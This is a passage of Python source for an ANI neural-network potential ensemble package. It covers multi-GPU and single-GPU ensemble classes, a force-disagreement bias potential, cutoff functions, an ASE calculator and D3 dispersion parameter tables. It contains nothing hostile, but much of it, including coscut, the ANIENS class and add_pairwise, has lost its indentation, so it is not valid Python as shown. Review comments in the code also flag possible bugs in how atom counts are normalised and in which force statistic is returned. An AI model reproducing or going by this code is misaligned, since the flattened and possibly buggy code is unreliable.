            self.forces[:] = [[] for i in range(2 * self.Nn)]
        else:
            self.forces[:] = [[] for i in range(self.Nn)]

        # Launch jobs
        for i in range(self.cores):
            self.task_list[i].put(data_dict)

        # Wait for jobs
        for i in range(self.cores):
            self.task_list[i].join()

        self.E = np.array(self.energy[:])
        self.F = np.stack(self.forces[:])
        return self.E, self.F

    def compute_props(self):
        """Evaluate every network on the stored geometry; returns per-network (E, F)."""
        data_dict = {'X': self.X,
                     'S': self.S,
                     'pbc': self.pbc,
                     'cell': self.cell,
                     'pinv': self.pinv}
        return self._dispatch(data_dict)

    def compute_props_by_net(self, X, S):
        """Like compute_props, but X carries one distinct geometry per network."""
        data_dict = {'X': X,
                     'S': S,
                     'pbc': self.pbc,
                     'cell': self.cell,
                     'pinv': self.pinv,
                     'bynet': True}
        return self._dispatch(data_dict)

    def compute_mean_props(self, disable_ani=False):
        """Ensemble statistics on the stored geometry.

        Returns (E_mean, F_mean, E_std/sqrt(Na), mean per-component F std).
        disable_ani keeps only the pairwise terms (or zeroes everything when
        pairwise is off).  Also fills self.intermediates.
        """
        self._dispatch({'X': self.X,
                        'S': self.S,
                        'pbc': self.pbc,
                        'cell': self.cell,
                        'pinv': self.pinv})

        self.intermediates = dict()
        if self.netdict['epw']:
            if disable_ani:
                Et = self.E[self.Nn:]
                Ft = self.F[self.Nn:]
            else:
                # Total = network term + pairwise term, slot-by-slot.
                Et = self.E[:self.Nn] + self.E[self.Nn:]
                Ft = self.F[:self.Nn] + self.F[self.Nn:]
            self.intermediates['Eele'] = np.mean(self.E[:self.Nn], axis=0)
            self.intermediates['Epws'] = np.mean(self.E[self.Nn:], axis=0)
            self.intermediates['Fele'] = np.mean(self.F[:self.Nn], axis=0)
            self.intermediates['Fpws'] = np.mean(self.F[self.Nn:], axis=0)
        else:
            if disable_ani:
                self.E = 0.0 * self.E
                self.F = 0.0 * self.F
            Et = self.E
            Ft = self.F

        # Force disagreement across the ensemble.
        dF = Ft - np.mean(Ft, axis=0)[np.newaxis, :, :]
        # Unbiased variance estimate, summed over atoms/components.
        v2 = np.sum(np.sum(np.power(dF, 2), axis=0) / (self.Nn * (self.Nn - 1)))
        self.intermediates['var_sqr'] = v2

        return np.mean(Et, axis=0), np.mean(Ft, axis=0), np.std(Et, axis=0) / np.sqrt(float(self.Na)), np.mean(np.std(Ft, axis=0))

    def compute_sigma_bias_potential(self, X, S, Efunc, Ffunc, epsilon=0.001, disable_ani=False):
        """Bias potential from ensemble force disagreement (central difference).

        Efunc maps the variance v2 to a bias energy; Ffunc maps (v2, ds/dx)
        to bias forces.  Returns (E, F, sigma_E, mean force std); the ANI
        mean is added unless disable_ani.
        """
        if self.Nn < 2:
            print('Error: compute_sigma_bias_potential requires more than 1 network in the ensemble.')
            raise ValueError

        # Initial force evaluation at X.
        self.set_molecule(X, S)
        E, F = self.compute_props()

        # Force disagreement dF.
        dF = F - np.mean(F, axis=0)[np.newaxis, :, :]

        # Forward / backward displaced evaluations, one geometry per network.
        E1, F1 = self.compute_props_by_net(X[np.newaxis, :, :] + epsilon * dF, S)
        E2, F2 = self.compute_props_by_net(X[np.newaxis, :, :] - epsilon * dF, S)

        # ds/dx via central difference.
        ds = np.sum((F1 - F2) / epsilon, axis=0) / (self.Nn * (self.Nn - 1))

        # Variance of the force disagreement.
        v2 = np.sum(np.sum(np.power(dF, 2), axis=0) / (self.Nn * (self.Nn - 1)))

        E_bias = Efunc(v2)
        F_bias = Ffunc(v2, ds)

        Eani = np.mean(E, axis=0)
        Fani = np.mean(F, axis=0)

        self.intermediates = {'Ebias': E_bias, 'Eani': Eani, 'Fbias': F_bias, 'Fani': Fani, 'var_sqr': v2}

        if not disable_ani:
            return E_bias + Eani, F_bias + Fani, np.std(E, axis=0) / np.sqrt(float(self.Na)), np.mean(np.std(F, axis=0))
        else:
            return E_bias, F_bias, np.std(E, axis=0) / np.sqrt(float(self.Na)), np.mean(np.std(F, axis=0))

    def cleanup(self):
        """Shut the workers down by sending one poison pill per queue."""
        # Idiom fix: was `for task, in zip(self.task_list):` -- the
        # single-element zip/unpack was equivalent but obfuscated.
        for task in self.task_list:
            task.put(None)

    def __del__(self):
        self.cleanup()
##-------------------------------------
## Class for ANI ensemble prediction
##--------------------------------------
class ensemblemolecule(object):
    """In-process ensemble of Nnet ANI networks, evaluated sequentially on one GPU."""

    def __init__(self, cnstfile, saefile, nnfprefix, Nnet, gpuid=0, sinet=False, forcesigma=False):
        # Number of networks
        self.Nn = Nnet

        # Construct pyNeuroChem molecule classes, one per ensemble member.
        self.ncl = [pync.molecule(cnstfile, saefile, nnfprefix + str(i) + '/networks/', gpuid, sinet) for i in
                    range(self.Nn)]

    def set_molecule(self, X, S):
        """Load species S and coordinates X into every network; reset result buffers."""
        for nc in self.ncl:
            nc.setMolecule(coords=np.array(X, dtype=np.float32), types=list(S))

        self.E = np.zeros((self.Nn), dtype=np.float64)
        self.F = np.zeros((self.Nn, X.shape[0], X.shape[1]), dtype=np.float32)
        self.Q = np.zeros((self.Nn, X.shape[0],), dtype=np.float32)
        self.Na = X.shape[0]  # atom count

    def set_molecule_per_net(self, X, S):
        """Load one distinct geometry per network; X has shape (Nn, natoms, 3)."""
        for nc, x in zip(self.ncl, X):
            nc.setMolecule(coords=np.array(x, dtype=np.float32), types=list(S))

        self.E = np.zeros((self.Nn), dtype=np.float64)
        self.F = np.zeros((self.Nn, X.shape[1], X.shape[2]), dtype=np.float32)
        # NOTE(review): here Na becomes X.shape[0] (= number of networks),
        # whereas set_molecule stores the atom count -- looks inconsistent;
        # confirm which normalization the later sqrt(Na) divisions expect.
        self.Na = X.shape[0]

    def request_setup(self):
        """Ask the first network whether a full setMolecule is required."""
        return self.ncl[0].request_setup()

    def set_coordinates(self, X):
        """Push new coordinates (same topology) to every network."""
        for nc in self.ncl:
            nc.setCoordinates(coords=X.astype(np.float32))

    def set_pbc(self, pbc0, pbc1, pbc2):
        """Set per-axis periodic-boundary flags on every network."""
        for nc in self.ncl:
            nc.setPBC(pbc0, pbc1, pbc2)

    def set_cell(self, cell, pbc_inv):
        """Set the cell matrix and its inverse on every network."""
        for nc in self.ncl:
            nc.setCell(cell, pbc_inv)

    def compute_stddev_molecule(self, X):
        """Std of ensemble energies at X, normalized by sqrt(atom count)."""
        for i, nc in enumerate(self.ncl):
            nc.setCoordinates(coords=X)
            self.E[i] = nc.energy()[0]
        sigma = np.std(self.E, axis=0) / np.sqrt(float(self.Na))
        return sigma

    def compute_props(self):
        """Return copies of per-network energies (Nn,) and forces (Nn, Na, 3)."""
        for i, nc in enumerate(self.ncl):
            self.E[i] = nc.energy().copy()
            self.F[i] = nc.force().copy()
        return self.E.copy(), self.F.copy()

    def compute_energies(self):
        """Return a copy of the per-network energies only."""
        for i, nc in enumerate(self.ncl):
            self.E[i] = nc.energy().copy()
        return self.E.copy()

    def compute_aenergies(self, sae):
        """Per-network atomic energies; the sae flag is forwarded to
        pyNeuroChem aenergies() (presumably toggling the self-atomic-energy
        shift -- confirm against pyNeuroChem docs)."""
        Ea = np.zeros((self.Nn, self.Na), dtype=np.float64)
        for i, nc in enumerate(self.ncl):
            Ea[i, :] = nc.aenergies(sae).copy()
        return Ea

    def compute_mean_props(self, disable_ani=False):
        """Ensemble statistics on the current geometry.

        Returns (E_mean, F_mean, E_std/sqrt(Na), mean per-component F std).
        disable_ani zeroes the network contributions.
        """
        for i, nc in enumerate(self.ncl):
            self.E[i] = nc.energy().copy()
            self.F[i] = nc.force().copy()
            if disable_ani:
                self.E[i] = 0.0*self.E[i]
                self.F[i] = 0.0*self.F[i]

        # Force disagreement across the ensemble.
        dF = self.F - np.mean(self.F, axis=0)[np.newaxis, :, :]

        # Unbiased variance estimate, summed over atoms/components.
        v2 = np.sum(np.sum(np.power(dF, 2), axis=0) / (self.Nn * (self.Nn - 1)))

        # Store intermediates
        self.intermediates = {'var_sqr': v2}

        # Return
        return np.mean(self.E, axis=0), np.mean(self.F, axis=0), np.std(self.E, axis=0) / np.sqrt(float(self.Na)), np.mean(np.std(self.F, axis=0))

    def compute_mean_energies(self):
        """Mean and per-atom-normalized std of the ensemble energies."""
        for i, nc in enumerate(self.ncl):
            self.E[i] = nc.energy().copy()
        return np.mean(self.E, axis=0), np.std(self.E, axis=0) / np.sqrt(float(self.Na))

    def compute_mean_charges(self):
        """Mean and std of per-atom charges across the ensemble."""
        for i, nc in enumerate(self.ncl):
            self.Q[i, :] = nc.get_charges().copy()
        return np.mean(self.Q, axis=0), np.std(self.Q, axis=0)

    def compute_sigma_bias_potential(self, X, S, Efunc, Ffunc, epsilon=0.001, disable_ani=False):
        """Bias potential from ensemble force disagreement (central difference).

        Returns (E, F, sigma_E, max force std).  NOTE(review): the multi-GPU
        variant returns np.mean of the force std in the last slot instead of
        np.max -- confirm which is intended.
        """
        if self.Nn < 2:
            print('Error: compute_sigma_bias_potential requires more than 1 network in the ensemble.')
            raise ValueError

        # Initial force evaluation at X.
        self.set_molecule(X, S)
        E, F = self.compute_props()

        # Force disagreement dF.
        dF = F - np.mean(F, axis=0)[np.newaxis, :, :]

        # Forward calc (one displaced geometry per network).
        self.set_molecule_per_net(X[np.newaxis, :, :] + epsilon * dF, S)
        E1, F1 = self.compute_props()

        # Backward calc
        self.set_molecule_per_net(X[np.newaxis, :, :] - epsilon * dF, S)
        E2, F2 = self.compute_props()

        # ds/dx via central difference.
        ds = np.sum((F1 - F2) / epsilon, axis=0) / (self.Nn * (self.Nn - 1))

        # Variance of the force disagreement.
        v2 = np.sum(np.sum(np.power(dF, 2), axis=0) / (self.Nn * (self.Nn - 1)))

        E_bias = Efunc(v2)
        F_bias = Ffunc(v2, ds)

        Eani = np.mean(E, axis=0)
        Fani = np.mean(F, axis=0)

        self.intermediates = {'Ebias': E_bias,'Eele': Eani,'Fbias': F_bias,'Fele': Fani,'var_sqr': v2}

        if not disable_ani:
            return E_bias+Eani, F_bias+Fani, np.std(E, axis=0) / np.sqrt(float(self.Na)), np.max(np.std(F, axis=0))
        else:
            return E_bias, F_bias, np.std(E, axis=0) / np.sqrt(float(self.Na)), np.max(np.std(F, axis=0))
##-------------------------------------
## Cos cutoff functions
##--------------------------------------
def coscut(Rmag, iRc, sRc):
return 0.5 * np.cos(math.pi * (Rmag+sRc) * iRc) + 0.5
def dcoscut(Rmag, R, iRc, sRc):
    """Gradient of coscut with respect to the Cartesian components R.

    Chain rule through Rmag = |R|: -0.5*pi*iRc*sin(pi*iRc*(Rmag+sRc)) times
    the unit vector R/Rmag.  Works elementwise/broadcast on numpy arrays.
    """
    phase = math.pi * iRc * (Rmag + sRc)
    radial = -0.5 * math.pi * iRc * np.sin(phase)
    return radial * R / Rmag
def tanhcut(Rmag, Shf):
    """Steep tanh switch centered at Shf: ~1 well below, 0.5 at Shf, ~0 above.

    The factor 20 sets the steepness of the transition.
    """
    arg = -20 * (Rmag - Shf)
    return 0.5 * np.tanh(arg) + 0.5
def dtanhcut(Rmag, R, Shf):
    """Gradient of tanhcut with respect to the Cartesian components R.

    Chain rule through Rmag = |R|: -10*sech^2(20*(Rmag-Shf)) times the
    unit vector R/Rmag (sech^2 written as 1 - tanh^2).
    """
    t = np.tanh(-20 * (Rmag - Shf))
    sech2 = 1.0 - np.power(t, 2)
    return -0.5 * 20 * sech2 * R / Rmag
##-------------------------------------
## ANI Ensemble ASE interface
##--------------------------------------
class ANIENS(Calculator):
implemented_properties = ['energy', 'forces', 'stress', 'dipole']
default_parameters = {'xc': 'ani'}
nolabel = True
### Constructor ###
def __init__(self, aniens, sdmax=sys.float_info.max, energy_conversion=conv_au_ev, **kwargs):
    """Wrap an ensemble object (ensemblemolecule / ensemblemolecule_multigpu)
    as an ASE calculator.

    aniens            -- ensemble prediction object providing the compute_* API
    sdmax             -- standard-deviation threshold (default: unbounded)
    energy_conversion -- factor applied to ensemble energies (a.u. -> eV default)
    """
    Calculator.__init__(self, **kwargs)
    self.nc = aniens
    self.energy_conversion = energy_conversion
    self.sdmax = sdmax
    self.Setup = True        # force a full molecule setup on first use
    self.nc_time = 0.0       # accumulated NeuroChem wall time
    self.Epwise = None
    self.Emodel = None
    self.pwiter = True       # pairwise neighbor list needs (re)building
    self.pairwise = False    # pairwise correction off until set_pairwise()
    self.add_bias = False    # sigma bias off until set_sigmabias()
    self.hipmodels = None    # optional HIP-NN dipole models
    self.ani_off = False     # when True, the ANI term is skipped

    # Tortional Restraint List
    self.tres = []

    # History buffers grown on demand by resize_XnDn().
    self.Xn = np.zeros((0, 0, 3), dtype=np.float64)
    self.Dn = np.zeros((0, 0, 3), dtype=np.float64)
### Set the pairwise functions ###
def set_pairwise(self, Efunc, Ffunc):
    """Enable the pairwise correction with energy function Efunc and
    force function Ffunc (both called from add_pairwise)."""
    self.pairwise = True
    self.Efunc = Efunc
    self.Ffunc = Ffunc
def set_sigmabias(self,bias_Efunc, bias_Ffunc, epsilon=0.001, disable_ani=False):
self.bias_Efunc = bias_Efunc
self.bias_Ffunc = bias_Ffunc
self.epsilon=epsilon
self.disable_ani_in_bias = disable_ani
self.add_bias=True
### Set HIPNN for dipole ###
def set_hipnn_dipole_model(self, hipmodels):
self.hipmodels = hipmodels
def resize_XnDn(self,ne):
if ne > self.Xn.shape[1]:
self.Xn = np.pad(self.Xn,((0, 0), (0, ne - self.Xn.shape[1]), (0, 0)), 'constant', constant_values=((0, 0), (0, 0), (0, 0)))
self.Dn = np.pad(self.Dn,((0, 0), (0, ne - self.Dn.shape[1]), (0, 0)), 'constant', constant_values=((0, 0), (0, 0), (0, 0)))
return self.Xn.shape[1]
def disable_ani(self):
self.ani_off = True
### Adds the pairwise energies/forces to the calculated ###
def add_pairwise(self, properties):
positions = self.atoms.get_positions()
mcut = 0.0
lcut = 2.5
if self.pwiter:
N = positions.shape[0]
self.nl = NeighborList(np.full(N, mcut/2.0), skin=0.25, self_interaction=False)
self.Xn = np.zeros((N, 0, 3), dtype=np.float64)
self.Dn = np.zeros((N, 0, 3), dtype=np.float64)
self.pwiter = False
#start_time = time.time()
self.nl.update(self.atoms)
Epairwise = 0.0
if 'forces' in properties:
Fpairwise = 0. * positions
# loop over all atoms in the cell
for ia, posa in enumerate(positions):
indices, offsets = self.nl.get_neighbors(ia)
#print('Neh/Dsp:', indices.shape, offsets.shape)
#nposition = positions[indices]
R = positions[indices] + np.dot(offsets, self.atoms.get_cell()) - posa[np.newaxis,:]
Rmag = np.linalg.norm(R,axis=1)
cidx = np.where( (Rmag >= lcut) & (Rmag < mcut) )
sidx = np.where(Rmag >= mcut)
E = self.Efunc(Rmag)
Ecut = coscut(Rmag[cidx], 1.0/(mcut-lcut), lcut)
#Ecut = tanhcut(Rmag[cidx], lcut-0.1*lcut)
E[cidx] = E[cidx]*Ecut
E[sidx] = 0.0*E[sidx]
Epairwise += E.sum() # Neighbors list supplies only neighbors once (NO DOUBLE COUNT)
if 'forces' in properties:
F = self.Ffunc(Rmag[:,np.newaxis],R)
F[cidx] = (E[cidx][:,np.newaxis]*dcoscut(Rmag[cidx][:,np.newaxis], R[cidx], 1.0/(mcut-lcut), lcut)+Ecut[:,np.newaxis]*F[cidx])
#F[cidx] = (E[cidx][:,np.newaxis]*dtanhcut(Rmag[cidx][:,np.newaxis], R[cidx], lcut-0.1*lcut)+Ecut[:,np.newaxis]*F[cidx])
F[sidx] = 0.0 * F[sidx]
Fpairwise[indices] += -F
Fpairwise[ia] += np.sum(F,axis=0)
self.results['energy'] += Epairwise
self.Epwise = Epairwise
if 'forces' in properties:
#print(Fpairwise.shape,np.sum(Fpairwise, axis=1))
#print(Fpairwise[0])
self.results['forces'] += Fpairwise
### Calculate function require by ASE ###
def calculate(self, atoms=None, properties=['energy'],
system_changes=all_changes):
Calculator.calculate(self, atoms, properties, system_changes)
## make up for stress
## TODO
# stress_ani = np.zeros((1, 3))
stress_ani = np.zeros(6)
## Check if models are initilized (first step)
if self.Setup or self.nc.request_setup():
# Setup molecule for MD
natoms = len(self.atoms)
atom_symbols = self.atoms.get_chemical_symbols()
xyz = self.atoms.get_positions()
self.nc.set_molecule(xyz.astype(np.float32), atom_symbols)
self.nc.set_pbc(bool(self.atoms.get_pbc()[0]), bool(self.atoms.get_pbc()[1]), bool(self.atoms.get_pbc()[2]))
# TODO works only for 3D periodic. For 1,2D - update np.zeros((3,3)) part
pbc_inv = (np.linalg.inv(self.atoms.get_cell())).astype(np.float32) if atoms.pbc.all() else np.zeros(
(3, 3), dtype=np.float32)
self.nc.set_cell((self.atoms.get_cell()).astype(np.float32), pbc_inv)
self.Setup = False
## Run this if models are initialized
else:
xyz = self.atoms.get_positions().astype(np.float32)
# Set the conformers in NeuroChem
self.nc.set_coordinates(xyz)
# TODO works only for 3D periodic. For 1,2D - update np.zeros((3,3)) part
pbc_inv = (np.linalg.inv(self.atoms.get_cell())).astype(np.float32) if atoms.pbc.all() else np.zeros(
(3, 3), dtype=np.float32)
self.nc.set_cell((self.atoms.get_cell()).astype(np.float32), pbc_inv)
## Compute the model properties (you can speed up ASE energy prediction by not doing force backprop unless needed.)
start_time = time.time()
if not self.add_bias:
energy, force, stddev, Fstddev = self.nc.compute_mean_props(disable_ani=self.ani_off)
self.Fstddev = Fstddev
else:
energy, force, stddev, Fstddev = self.nc.compute_sigma_bias_potential(self.atoms.get_positions().astype(np.float32),
self.atoms.get_chemical_symbols(),
self.bias_Efunc, self.bias_Ffunc,
epsilon=self.epsilon,
disable_ani=self.disable_ani_in_bias)
self.Fstddev=Fstddev
self.nc_time+=time.time() - start_time
## convert std dev to correct units
self.stddev = self.energy_conversion * stddev
## Store energies in ASE
self.results['energy'] = energy
self.Emodel = energy
## If forces are requested store forces
if 'forces' in properties:
forces = force
if len(self.tres) > 0:
for res in self.tres:
forces = hard_restrain_tortion_force(res, xyz, forces)
self.results['forces'] = forces
## Set stress tensor
self.results['stress'] = self.energy_conversion * stress_ani
## If the HIP-NN model is set run this for dipoles
if self.hipmodels is not None:
Z = self.atoms.get_atomic_numbers()
R = self.atoms.get_positions()
R = R.reshape([1,len(Z),3])
Z = Z.reshape([1, len(Z)]).astype(np.int32)
dipole = np.zeros((3),dtype=np.float32)
for hippy in self.hipmodels:
output = hippy.pred_fn([Z, R], shape_output=True)
dipole += output[1][0][0]
self.results['dipole'] = dipole/len(self.hipmodels)
## Compute pairwise if requested
if self.pairwise:
self.add_pairwise(properties)
## Convert energies and forces to requested units
self.results['energy'] = self.energy_conversion * self.results['energy']
if 'forces' in properties:
self.results['forces'] = self.energy_conversion * self.results['forces']
### NL Update function now handled internally ###
def __update_neighbors(self):
for a in range(0, len(self.atoms)):
indices, offsets = self.nlR.get_neighbors(a)
self.nc.setNeighbors(ind=a, indices=indices.astype(np.int32), offsets=offsets.astype(np.float32))
### Return the atomic energies (in eV) ###
def get_atomicenergies(self, atoms=None, properties=['energy'],
system_changes=all_changes,sae=False):
Calculator.calculate(self, atoms, properties, system_changes)
## make up for stress
## TODO
stress_ani = np.zeros((1, 3))
if self.Setup or self.nc.request_setup():
# Setup molecule for MD
natoms = len(self.atoms)
atom_symbols = self.atoms.get_chemical_symbols()
xyz = self.atoms.get_positions()
self.nc.setMolecule(coords=xyz.astype(np.float32), types=atom_symbols)
self.Setup = False
else:
xyz = self.atoms.get_positions()
# Set the conformers in NeuroChem
self.nc.set_coordinates(xyz.astype(np.float32))
E = self.nc.compute_energies()
return self.nc.compute_aenergies(sae) * conv_au_ev
##--------------------------------------------------------------
## Easy loader for ANI networks in python interface
##--------------------------------------------------------------
def aniensloader(model, gpu=0, multigpu=False):
    """Load an ANI ensemble described by an info file.

    The info file lists, one entry per line: the AEV constants file, the
    SAE (atomic shifts) file, the network-directory prefix, and the
    ensemble size. All paths are resolved relative to the info file.

    NOTE(review): wkdir = model.rsplit('/', 1)[0] + '/' assumes `model`
    contains a '/'; a bare filename yields a wrong directory — confirm
    callers always pass a path.
    """
    # Set locations of all required network files
    wkdir = model.rsplit('/', 1)[0] + '/'  # Note the relative path
    data = np.loadtxt(model, dtype=str)
    cnstfile = wkdir + data[0]  # AEV parameters
    saefile = wkdir + data[1]  # Atomic shifts
    nnfdir = wkdir + data[2]  # network prefix
    Nn = int(data[3])  # Number of networks in the ensemble
    if multigpu:
        if not isinstance(gpu, list):
            raise ValueError('When running on multiple GPUs please supply the GPU indices in a list.')
        return ensemblemolecule_multigpu(cnstfile, saefile, nnfdir, Nn, gpu)
    else:
        return ensemblemolecule(cnstfile, saefile, nnfdir, Nn, gpu)
###
# ANI with D3 correction
##
if d3present:
    # Grimme DFT-D3 dispersion support (only defined when the d3 module
    # was importable).
    d3_calc = d3.d3_calc
    alp = 14.
    # D3 (zero-damping) parameters per functional
    # (RS6 , S18 , RS18 , S6 )
    damp0 = {
        'ani': (1.281, 1.0940, 1.000, 1.00),
        'slater-dirac-exchange': (0.999, -1.957, 0.697, 1.00),
        'b-lyp': (1.094, 1.6820, 1.000, 1.00),
        'b-p': (1.139, 1.6830, 1.000, 1.00),
        'b97-d': (0.892, 0.9090, 1.000, 1.00),
        'revpbe': (0.923, 1.0100, 1.000, 1.00),
        'pbe': (1.217, 0.7220, 1.000, 1.00),
        'pbesol': (1.345, 0.6120, 1.000, 1.00),
        'rpw86-pbe': (1.224, 0.9010, 1.000, 1.00),
        'rpbe': (0.872, 0.5140, 1.000, 1.00),
        'tpss': (1.166, 1.1050, 1.000, 1.00),
        'b3-lyp': (1.261, 1.7030, 1.000, 1.00),
        'pbe0': (1.287, 0.9280, 1.000, 1.00),
        'hse06': (1.129, 0.1090, 1.000, 1.00),
        'revpbe38': (1.021, 0.8620, 1.000, 1.00),
        'pw6b95': (1.532, 0.8620, 1.000, 1.00),
        'tpss0': (1.252, 1.2420, 1.000, 1.00),
        'b2-plyp': (1.427, 1.0220, 1.000, 0.64),
        'pwpb95': (1.557, 0.7050, 1.000, 0.82),
        'b2gp-plyp': (1.586, 0.7600, 1.000, 0.56),
        'ptpss': (1.541, 0.8790, 1.000, 0.75),
        'hf': (1.158, 1.7460, 1.000, 1.00),
        'mpwlyp': (1.239, 1.0980, 1.000, 1.00),
        'bpbe': (1.087, 2.0330, 1.000, 1.00),
        'bh-lyp': (1.370, 1.4420, 1.000, 1.00),
        'tpssh': (1.223, 1.2190, 1.000, 1.00),
        'pwb6k': (1.660, 0.5500, 1.000, 1.00),
        'b1b95': (1.613, 1.8680, 1.000, 1.00),
        'bop': (0.929, 1.9750, 1.000, 1.00),
        'o-lyp': (0.806, 1.7640, 1.000, 1.00),
        'o-pbe': (0.837, 2.0550, 1.000, 1.00),
        'ssb': (1.215, 0.6630, 1.000, 1.00),
        'revssb': (1.221, 0.5600, 1.000, 1.00),
        'otpss': (1.128, 1.4940, 1.000, 1.00),
        'b3pw91': (1.176, 1.7750, 1.000, 1.00),
        'revpbe0': (0.949, 0.7920, 1.000, 1.00),
        'pbe38': (1.333, 0.9980, 1.000, 1.00),
        'mpw1b95': (1.605, 1.1180, 1.000, 1.00),
        'mpwb1k': (1.671, 1.0610, 1.000, 1.00),
        'bmk': (1.931, 2.1680, 1.000, 1.00),
        'cam-b3lyp': (1.378, 1.2170, 1.000, 1.00),
        'lc-wpbe': (1.355, 1.2790, 1.000, 1.00),
        'm05': (1.373, 0.5950, 1.000, 1.00),
        'm052x': (1.417, 0.0000, 1.000, 1.00),
        'm06l': (1.581, 0.0000, 1.000, 1.00),
        'm06': (1.325, 0.0000, 1.000, 1.00),
        'm062x': (1.619, 0.0000, 1.000, 1.00),
        'm06hf': (1.446, 0.0000, 1.000, 1.00),
        'dftb3': (1.235, 0.6730, 1.000, 1.00),
        'hcth120': (1.221, 1.2060, 1.000, 1.00),
    }
    # D3(BJ) (Becke-Johnson damping) parameters per functional
    # (RS6 , S18 , RS18 , S6 )
    dampbj = {
        'ani': (0.48310, 2.00770, 4.5323, 1.00),
        'b-p': (0.39460, 3.28220, 4.8516, 1.00),
        'b-lyp': (0.42980, 2.69960, 4.2359, 1.00),
        'revpbe': (0.52380, 2.35500, 3.5016, 1.00),
        'rpbe': (0.18200, 0.83180, 4.0094, 1.00),
        'b97-d': (0.55450, 2.26090, 3.2297, 1.00),
        'pbe': (0.42890, 0.78750, 4.4407, 1.00),
        'rpw86-pbe': (0.46130, 1.38450, 4.5062, 1.00),
        'b3-lyp': (0.39810, 1.98890, 4.4211, 1.00),
        'tpss': (0.45350, 1.94350, 4.4752, 1.00),
        'hf': (0.33850, 0.91710, 2.8830, 1.00),
        'tpss0': (0.37680, 1.25760, 4.5865, 1.00),
        'pbe0': (0.41450, 1.21770, 4.8593, 1.00),
        'hse06': (0.38300, 2.31000, 5.6850, 1.00),
        'revpbe38': (0.43090, 1.47600, 3.9446, 1.00),
        'pw6b95': (0.20760, 0.72570, 6.3750, 1.00),
        'b2-plyp': (0.30650, 0.91470, 5.0570, 0.64),
        'dsd-blyp': (0.00000, 0.21300, 6.0519, 0.50),
        'dsd-blyp-fc': (0.00090, 0.21120, 5.9807, 0.50),
        'bop': (0.48700, 3.29500, 3.5043, 1.00),
        'mpwlyp': (0.48310, 2.00770, 4.5323, 1.00),
        'o-lyp': (0.52990, 2.62050, 2.8065, 1.00),
        'pbesol': (0.44660, 2.94910, 6.1742, 1.00),
        'bpbe': (0.45670, 4.07280, 4.3908, 1.00),
        'opbe': (0.55120, 3.38160, 2.9444, 1.00),
        'ssb': (-0.0952, -0.1744, 5.2170, 1.00),
        'revssb': (0.47200, 0.43890, 4.0986, 1.00),
        'otpss': (0.46340, 2.74950, 4.3153, 1.00),
        'b3pw91': (0.43120, 2.85240, 4.4693, 1.00),
        'bh-lyp': (0.27930, 1.03540, 4.9615, 1.00),
        'revpbe0': (0.46790, 1.75880, 3.7619, 1.00),
        'tpssh': (0.45290, 2.23820, 4.6550, 1.00),
        'mpw1b95': (0.19550, 1.05080, 6.4177, 1.00),
        'pwb6k': (0.18050, 0.93830, 7.7627, 1.00),
        'b1b95': (0.20920, 1.45070, 5.5545, 1.00),
        'bmk': (0.19400, 2.08600, 5.9197, 1.00),
        'cam-b3lyp': (0.37080, 2.06740, 5.4743, 1.00),
        'lc-wpbe': (0.39190, 1.85410, 5.0897, 1.00),
        'b2gp-plyp': (0.00000, 0.25970, 6.3332, 0.56),
        'ptpss': (0.00000, 0.28040, 6.5745, 0.75),
        'pwpb95': (0.00000, 0.29040, 7.3141, 0.82),
        'hf/mixed': (0.56070, 3.90270, 4.5622, 1.00),
        'hf/sv': (0.42490, 2.18490, 4.2783, 1.00),
        'hf/minis': (0.17020, 0.98410, 3.8506, 1.00),
        'b3-lyp/6-31gd': (0.50140, 4.06720, 4.8409, 1.00),
        'hcth120': (0.35630, 1.08210, 4.3359, 1.00),
        'dftb3': (0.74610, 3.20900, 4.1906, 1.00),
    }
# Class of ANI + D3 energies
    class ANID3(Calculator):
        """ASE calculator combining an ANI network with Grimme D3 dispersion."""
        implemented_properties = ['energy', 'forces', 'stress']
        # rs6/s18/rs18/s6 of None mean "use the xc lookup table"
        default_parameters = {'xc': 'ani',
                              'bj': True,
                              'threebody': True,
                              'rcut': 95 * Bohr,
                              'rcutcn': 40 * Bohr,
                              'rs6': None,
                              's18': None,
                              'rs18': None,
                              's6': None,
                              'calculator': None}
        nolabel = True

        def __init__(self, build=True, gpuid=0, reslist=[], **kwargs):
            # NOTE(review): mutable default `reslist=[]` is shared between
            # instances; safe only while callers never mutate it — confirm.
            Calculator.__init__(self, **kwargs)
            if build:
                # default ANI-c08f network files shipped next to this package
                anipath = os.path.dirname(__file__)
                cnstfile = anipath + '/../ANI-c08f-ntwk/rHCNO-4.6A_16-3.1A_a4-8.params'
                saefile = anipath + '/../ANI-c08f-ntwk/sae_6-31gd.dat'
                nnfdir = anipath + '/../ANI-c08f-ntwk/networks/'
                self.nc = pync.molecule(cnstfile, saefile, nnfdir, gpuid)
            self.Setup = True
            self.reslist = reslist  # indices of atoms whose forces are zeroed (restrained)

        def setnc(self, nc):
            # inject an externally built NeuroChem molecule object
            self.nc = nc

        def calculate(self, atoms=None, properties=['energy'],
                      system_changes=all_changes):
            """Compute ANI energy/forces plus the D3 dispersion correction."""
            Calculator.calculate(self, atoms, properties, system_changes)
            xc = self.parameters.xc.lower()
            bj = self.parameters.bj
            threebody = self.parameters.threebody
            rcut = self.parameters.rcut
            rcutcn = self.parameters.rcutcn
            calculator = self.parameters.calculator
            # pick the damping table: Becke-Johnson or zero damping
            if bj:
                damp = dampbj
            else:
                damp = damp0
            rs6 = s18 = rs18 = s6 = None
            try:
                rs6, s18, rs18, s6 = damp[xc]
            except KeyError:
                unknown_functional = True
            else:
                unknown_functional = False
            # explicitly supplied parameters override the lookup table
            if self.parameters.s6 is not None:
                s6 = self.parameters.s6
            if self.parameters.s18 is not None:
                s18 = self.parameters.s18
            if self.parameters.rs6 is not None:
                rs6 = self.parameters.rs6
            if self.parameters.rs18 is not None:
                rs18 = self.parameters.rs18
            if unknown_functional and None in (s6, s18, rs6, rs18):
                raise ValueError("Unknown functional {}! \
                Please specify damping parameters.".format(xc))
            # D3 calculation part
            energy_d3, forces_d3, stress_d3 = d3_calc(
                self.atoms.get_atomic_numbers(),
                self.atoms.get_cell(),
                self.atoms.get_positions().T,
                rcut=rcut,
                rcutcn=rcutcn,
                s6=s6,
                s18=s18,
                rs6=rs6,
                rs18=rs18,
                alp6=alp,
                alp8=alp + 2,
                pbc=self.atoms.get_pbc(),
                bj=bj,
                threebody=threebody)
            ## make up for stress
            ## TODO
            stress_ani = np.zeros(6)
            if self.Setup or self.nc.request_setup():
                # Setup molecule for MD
                natoms = len(self.atoms)
                atom_symbols = self.atoms.get_chemical_symbols()
                xyz = self.atoms.get_positions()
                self.nc.setMolecule(coords=xyz.astype(np.float32), types=atom_symbols)
